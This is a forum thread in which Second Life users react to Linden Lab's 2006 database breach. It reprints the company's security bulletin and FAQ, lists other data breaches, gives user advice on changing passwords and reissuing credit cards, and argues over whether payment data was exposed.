Stolen Creditcards

Well as most of us know... SL was hacked and hackers found that ALL OF OUR INFO is accesable to them... yea you think it wont happen to you because like thousands of people play secondlife... well its gota be somebody and when they get all there information stolen AND there credit card information taken and used.... that would really suck espessially if it were to be you... think about it you THINk you trust sl and what there saying... did we recieve a warning NO and for gods sakes SL said they succesfully broke into the data base so.. who knows if our credit cards hadent been stolen already... this really pisses me off im about to drop sl... hmm get credit card info stolen or be safe and not have other people use our information... gee wiz thats a really hard question to answer.... just though all of yall should look at it like that (ps sry for the bad spelling) lol

ASAP!!
Most will have programs to gaurd against theft and will replace funds taken or charges made to credit/debit cards, thats what my bank told me tonite when i called, you must watch and report immediatly..

I cant help but wonder if LL did not advise us in time to stop theft, if the card companies and banks wont hold them liable for any theft that they have to compensate LL customers, could be quite an undoing for them.

This whole situation is a disgrace, for a start it happened in the 6th, the first I heard about it was the 8th and the scale of what was possible. On this matter the Lindens have no defence, and no excuses will save them, they have been utterly incompetant and negligent on several issues with this.

agreed sl has fucked up b4 but this time they fucked up hard... btw it was there fault they didnt make the pwords safe enough

"No credit card information is stored on the database in question, and that information has not been compromised."

-From the official notification.

I would find it nearly impossible for the credit cards not to be encrypted in their database.

However, if it makes you feel better, call your banks and have them do the tests... personally I feel this will be a waste of time better spent.

For those who will bitch and complain and call me stupid. Think about it people, why would LL post that the credit cards are secure if they are not? Doing that would only serve to hurt their professional credibility.

I think they'll be feeling the sting of this for many, many months to come.

After all, this security breach will no doubt make more headlines and reach more people than their covergirl or some politician pretending to be 'cool' here ever will.

Lewis

Bad news always travels faster and it sticks around a lot longer too.

That is not the text of the blog statement, nor the information from the email sent to all residents last night. The blog announcement specifically said that CC information WAS stored on that database and WAS compromised...albeit in encrypted form. However...passwords were also in the same encrypted form according to their own email statement, and they are forcing those to be reset as a "precaution". Does that not imply that encrypted CC information that was compromised is not also at risk and should be changed accordingly? Sure sounds that way to me. And according to LL's own legal email sent out last night to all residents, they encourage you to take those very actions to protect your CCs, email and other personal information.

No idea where your quote comes from, but that statement you display directly contridicts all other information LL has published.

A bit of a technical question here, since I'm not very techy.

Do I understand this right:

1. Whoever did the hacking now has all the information himself. Stored on his own computer, or wherever, to do with as he will on his own time.

2. This information includes:

. Our real life names and addresses (not encrypted?), and any other personal information we put in when we signed up.

. The credit card number we used to sign up (or to buy money, or whatever), encrypted.

. Any paypal account the Lindens had, and any information people put in about their paypal account (which I believe would not include the passwords, etc. - one would not give that to the Lindens, right?)

. Anything I left out?

3. Which means that now, unless apprehended, this individual can take his time to decode and do whatever with all this information?

coco

Is that really a sting? If this does get publicity, a lot of people will hear about SL who wouldn't have otherwise. Getting hacked happens to a lot of companies - it's not that new or scary. People are more likely to be intrigued by the possibilities. I just started a couple of weeks ago and hardly anyone at work had heard about SL. I've been talking about it at lunch and people find it fascinating. One guy said that it makes his head spin to realize that something like this actually exists. They're getting accounts to check it out.

Oldbies might have forgotten how really amazing SL is. For many people just hearing about it for the first time, the excitement way outweighs the news of a hack.

At least this hack happened now, when there are only a few hundred thousand accounts. Hopefully it'll be a learning experience for LL and will be less likely to happen in the future. And that they told us about it and did the best they could at the time to fix things, even though it caused chaos and peeved a lot of people off, shows that we can trust them to try to do what's right. If this does happen again I bet the cleanup will be much smoother.

Yes, Coco...according to LL's own blog and legal email, the criminal hacker had access to, and may now possess on their own computer for sale, use or distribution to other criminal elements:

Real Life Names - Unencrypted

Real Life Addresses - Unencrypted

Real Life Phone Numbers - Unencrypted

Real Life Birthdates - Unencrypted

SL Account Names - Unencrypted

Real Life Credit Card Numbers - Encrypted

Real Life Credit Card Holder Name - ??? Status not stated by LL.

Real Life Paypall Account Info - Encrypted

SL Account Passwords - Encrypted

SL Account Security Question - ??? Status not stated by LL.

SL Account Security Answer - ??? Status not stated by LL.

All this information was available to the hacker and it would all be linked to your RL name and information. Thus, if you used your Mother's maiden name as a security question, the hacker may have enough information, even without unencrypting the CC numbers to steal your identity IRL. If passwords were similar or the same to ones used elsewhere, such as email, the hacker may have access to email and other important accounts once password encryption is broken. All passwords, CC information and email settings should be changed to prevent this.

What should you do? LL's own legal email suggested taking every precaution for your RL information, accounts and financial records, and said we should assume the hacker has access to all information you have ever given LL. In my opinion, it would be wish to do the following:

1. Change SL Account Password (Forced by LL).

2. Change RL Email Password (specifically if it is similar or the same to SL Account Password)

3. Notify CC Issuer of the issue and have all CCs ever used with SL or held by that issuer re-issued.

4. Change Paypal Password. (They have your email which is usually your paypal account name, and if your password is reused for both Paypal and SL, they can hack your Paypall once they decrypt the Passwords. Many Paypal accounts are now linked to your bank account. This could get ugly. Change this info fast).

5. Report immediately any and all suspicious activity related to any information or accounts, email, or CCs that have been associated with SL.

6. Change Security questions for RL Accounts to not match SL security Question. (Extra precaution, but it is assumed this information is also in their hands. Maiden name, streets, pets...these are common security questions accross many industries. Change yours on Bank Accounts, and other accounts to be something new and different from SL's security question).

Some people will say these steps are overkill, but I disagree. LL's legal department also seems to disagree as the same basic steps were recommended in a less detailed form in the letter sent out to residents last night. There are already reports since last week of people's SL Accounts, email accounts, and possibility more being accessed. Assume the worst and take precautions. Precautions are warrented, and there is no such thing as being to cautious with your security, financial information, and identity.

OK, thanks, and I just found the thing that went to e-mails on Cristiano's site:

Hello Second Lifers,

As announced on our website at http://secondlife.com/corporate/bulletin.php and corporate blog at http://blog.secondlife.com/?tag=security, Second Life discovered an attack on our servers on September 6, 2006. The full security bulletin is reprinted below, followed by a FAQ that includes important security advice for our community.

===================
SECURITY BULLETIN


*SAN FRANCISCO, CA. (September 8, 2006)* - Linden Lab reported today that it is notifying its community of a database breach, which potentially exposed customer data including the unencrypted names and addresses, and the encrypted passwords and encrypted payment information of all Second Life users. Unencrypted credit card information, which is stored on a separate database, was not compromised.

The breach was discovered on September 6, 2006 and promptly repaired. The company then launched a detailed investigation that revealed an intruder was able to access the Second Life databases utilizing a "Zero-Day Exploit" through third-party software utilized on Second Life servers. Due to the nature of the attack, the company cannot determine which individual data were exposed. The company's technical investigation is ongoing.

"We're taking a very conservative approach and assuming passwords were compromised and therefore we're requiring users to change their Second Life passwords immediately," said Cory Ondrejka, CTO of Linden Lab. "While we realize this is an inconvenience for residents, we believe it's the safest course of action. We place the highest priority on protecting customer data and will continue to take aggressive measures to protect the privacy and security of the community."

Linden Lab advises all users to take appropriate precautions against misuse of personal information. To reduce the risk of fraud, Linden Lab will not contact individuals by phone or any other method asking for private information unless it is in response to an inquiry from the individual user.

===================
FREQUENTLY ASKED QUESTIONS

Q: I can't log in to Second Life. How can I regain login access?

A: As a security precaution, all Second Life account passwords have been invalidated. You need to establish a new password in order to log in. You can receive instructions for changing your password by visiting http://secondlife.com/password. Please note that we are updating the password request process - if you have recently tried that page and could not change your password, please try again.


Q: Was my account information compromised?

A: We discovered that a database was accessed by the intruder, and we are able to determine the aggregate size of the data that was downloaded through the intrusion. The database accessed includes customer account information, including Second Life account names, real-life name and contact information in unencrypted form. Account passwords and payment information (consisting of credit card numbers and Paypal transaction IDs) are stored in this same database in encrypted form. However, there is no way to identify which data were accessed at the level of individual users, only the aggregate size of the downloads returned from the intruding database queries. We are conducting further investigation to try to determine the class of data exposed.


Q. Is my information still at risk from another attacker?

A: The compromised system was rebuilt and made more secure. We will be announcing additional plans for security improvements in a post to come on our blog, at http://blog.secondlife.com/?tag=security.


Q: Should I be concerned that encrypted password and encrypted payment information may have been exposed? Is the encryption unbreakable?

A: We use an MD-5 hash (scramble function) and salt (additional data) to encode passwords and payment information, an industry standard technique that is commonly regarded as difficult to defeat. However, no hash or encryption is unbreakable, given enough time and computing power. If you believe that you may be the victim of credit card fraud, you should contact your credit card company. If you use your Second Life password on other websites, online services, or any other services, you should change the password on that service as well. You can find additional tips for protection of your identity online at http://www.privacy.ca.gov/sheets/cis1english.htm.


Q: What kind of attack was used to gain access to the Second Life databases? Has the identity of the attacker been established?

A: We have gathered a significant amount of information regarding the attack and the attacker. However, because the investigation is ongoing, we cannot provide very detailed information regarding the type of attack or identity of the attacker. We can disclose that the intrusion path took advantage of a "zero-day exploit" in third-party web software.


Q: What was the timing of the attack and Linden Lab's investigation?

A: Our forensic investigation began on September 6, 2006. Based on this investigation, the intrusion attempts may have started as early as September 3, 2006. However, we have not found evidence of successful database access occurring before September 5, 2006. On September 6, 2006, unusual activity in our database logs revealed the attack to Linden Lab, and we investigated, found and closed the intrusion on the same day. At that point, there was no evidence that databases containing customer identity information had been compromised. For the following two days, the focus of our investigation was to determine the extent of the database access and the nature of the data downloaded from our system. On September 8, 2006, we concluded that there was a substantial likelihood that customer account information could have been accessed. The investigation is ongoing and we will report further results as they become available at http://blog.secondlife.com/?tag=security.

Sincerely,

Linden Lab and the Second Life team

Question: Has this ever happened before, with other companies? If so, who?

coco

Yes. Here's a list for the last year and a half.

http://www.privacyrights.org/ar/ChronDataBreaches.htm

I think before that they weren't required to report it.

Here's a small snip from the list:

May 30, 2005 Motorola Computers stolen Unknown
June 6, 2005 CitiFinancial Lost backup tapes 3,900,000
June 10, 2005 Fed. Deposit Insurance Corp. (FDIC) Not disclosed 6,000
June 16, 2005 CardSystems Hacking 40,000,000
June 17, 2005 Kent State Univ. Stolen laptop 1,400
June 18, 2005 Univ. of Hawaii Dishonest Insider 150,000
June 22, 2005 Eastman Kodak Stolen laptop 5,800
June 22, 2005 East Carolina Univ. Hacking 250

FDIC Insured!

Whilst the woman at the call centre at the bank was checking through my account to make sure there was nothing untoward showing up, she asked me what this game was, and I mentioned its name and a bit about it, and she said she was going to look it up when she got home.

But in all honesty, if my first information about an 'exciting new online game' was that there had been a security breach, and over half a million users' personal information and credit card details had been stolen by a hacker, I would be very wary of giving any honest information to them.

Lewis

I'm a little surprised that credit card information is even stored on the same server as the registration information. Ideally it would be stored in the form as an encrypted reference to another database on a completely different server, accessible only through a secure gateway behind the LL firewalls. While personal information would be compromised, that particular bit wouldn't have been - the situation is still dire, but direct access to our credit cards would not be something the hacker(s) got.

Depending on how strong the encryption algorithm is, the hacker could potentially decrypt the credit card information if they were determined enough and had enough computing resources to do it. From some of the other posts I've been seeing, their main goal was to hijack accounts to sell off property and transfer Lindens into RL monies. Accessing the credit cards themselves was apparently not their goal.

It's pretty easy to believe that LL is busy trying to track down the hacker, because they used a computer to syphon off real world funds from the users of Second Life. That makes it a federal crime, and that's where the FBI gets involved.

Pretty serious stuff.

Sept. 7, 2006
Circuit City and Chase Card Services, a division of JP Morgan Chase & Co

Chase Card Services mistakenly discarded computer tapes containing Circuit City cardholders' personal information.

2.6 million past and current Circuit City credit card holders

Ouch....

Lewis

I'm not, I see this kind of thing all the time where programmers roll their own security.

Most companies treat security the same as they do bugs. They are really different, bugs are just an annoyance, security breaches can have serious monetary consequences. We all know how LL treats bugs: Ignore them.

Given that the only secure method is to have a well known and respected security firm review the security and make recommendations. Obviously this was not done since the authentication was not separated sufficiently from the user information. Allowing the user information to be on a server outside the corporate firewall is close to criminal. Of course that may not have been the case, the problem could been as simple as a easily guessed root password.

If LL does not get an expert security review of it's systems this will happen again and again and ...

I wonder how many linden staff had their personal details and their personal credit card info in the same database as ours ?

I suspect that no linden employees had their details stolen.

I believe that the only way that confidence can begin to be restored will be after a security review has been carried out by an external audit, fixes applied and tested and then ALL linden staff have their personl RL names and addresses and personal credit card details put through the same process and stored in the same way as the rest of us.

If the process is not safe enough for Linden staff, why is it safe enough for us ?

Well for all we know, they had to reset their passwords too.
I'm glad that they addressed the security issues and that they intend to beef up their system now, though that doesn't mean they're in the clear. I wonder what possible action can be taken against LL if someone is a victim of identity theft or credit card fraud as a result of this exploit? I think this will be a thorn in their side for quite some time.

It's not just reseting SL passwords - It's the associated exposure to RL personal details and Credit Card details from now until those details are no longer usable.

I have had to cancel a credit card and amend payment details so that the CC details are now of no value - except it's gonig to take at least week before i can use my new credit card - inconvenient but not too bad.

Unfortunately, changing my REAL name and address and phone number - all of which are equally valuable and equally compromised - is not an option - I will have to live with SL's exposure of my details from now on.

I just want to know that the new mechanism for securing my details is good enough that the people that wrote it and administer it are confident enough to put THEIR OWN details in the firing line as well as mine!!!

The sky is falling! The sky is falling!

On top of that, even if you cancelled your account months before this attack, the hacker has your cc info because LL keeps it in their database!

What's the point of cancelling an account if all of your information is still in their system for hackers to get their hands on and you as a customer have no way of changing that data?

Make an unconfirmed statment, and then follow up with a loaded question BASED on mis-information?

You may now wander into the troll-barn, now. You have nothing else that will cause me to pay attention to you.

I wasn't intending to 'troll' - I'm just upset that this has happened as it's the first time - to my knowledge - that my details have been compromised in this way.

I expected better of SL than this - although I've only been in SL for a few weeks, it has been really interesting and good fun - I was just starting to get to grips with scripting and building things.

I understand that there is a diversity of opinion - so you guys are entitled to yours just as I am to mine.

I will wait to see what action SL takes to resolve the security issue.

good luck for the future